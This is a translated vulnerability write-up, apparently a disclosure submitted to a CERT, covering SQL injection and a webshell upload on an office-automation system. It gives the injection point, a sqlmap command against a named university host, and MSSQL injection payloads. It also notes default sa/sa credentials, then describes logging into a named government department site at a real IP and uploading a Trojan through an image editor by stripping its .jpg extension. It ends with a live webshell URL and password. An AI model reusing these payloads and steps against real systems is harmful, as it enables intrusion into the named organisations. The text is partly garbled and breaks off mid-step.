SQL Injection + background getshell in an OA system
SQL Injection in an OA system + getshell in the background: the first time a general-purpose vulnerability is submitted, it's so tight. [Bye-bye]
[SQL injection]
SQL Injection exists on the login page of the OA system. Several tests showed that the backend was MSSQL, and most of them can run commands in the OS-shell.
Injection point:
http://VICTIM.COM/loginverify.asp
POST Data:
Digest=&urlFrom=&username=admin&password=admin&Memo=1
The username parameter exists in SQL injection.
Instance:
sqlmap.py -u "http://oa.tjfsu.edu.cn/loginverify.asp" --data "Digest=&urlFrom=&username=admin&password=admin&Memo=1" -p username
sqlmap identified the following injection points with a total of 90 HTTP(s) requests:---Place: POSTParameter: username Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: Digest=&urlFrom=&username=admin' AND 2836=CONVERT(INT,(SELECT CHAR(113)+CHAR(111)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (2836=2836) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(103)+CHAR(108)+CHAR(100)+CHAR(113))) AND 'HQUn'='HQUn&password=admin&Memo=1 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: Digest=&urlFrom=&username=admin'; WAITFOR DELAY '0:0:5'--&password=admin&Memo=1 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: Digest=&urlFrom=&username=admin' WAITFOR DELAY '0:0:5'--&password=admin&Memo=1---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2005
After sqlmap -- dbs, you can find a database called "HaiTianOA". The "VO_UserInfor" Table stores the account and password of the administrator who can log on to the database (most of which have sa/sa. Some passwords are in plain text, while others are BASE64 encrypted ).
Please CNCERT to verify more instances by yourself.
[Getshell in the background]
Use sa/sa to log on to the Shanghai city appearance, environment, and sanitation vehicle transportation department (http: // 180.166.7.94 /).
After logging on, click "information content maintenance"-"modify"
Click the Add image button in the editor to open "http://VICTIM.COM/ckeditor/tupianadd.asp"
Modify the suffix of the Trojan file to. jpg, capture the package, and delete .jpg.
Although HTTP500 is returned, the upload is successful.
After splicing, you can get a trojan URL: http: // 180.166.7.94/file/images/20147408067349.asp password helo
Kitchen Knife connection: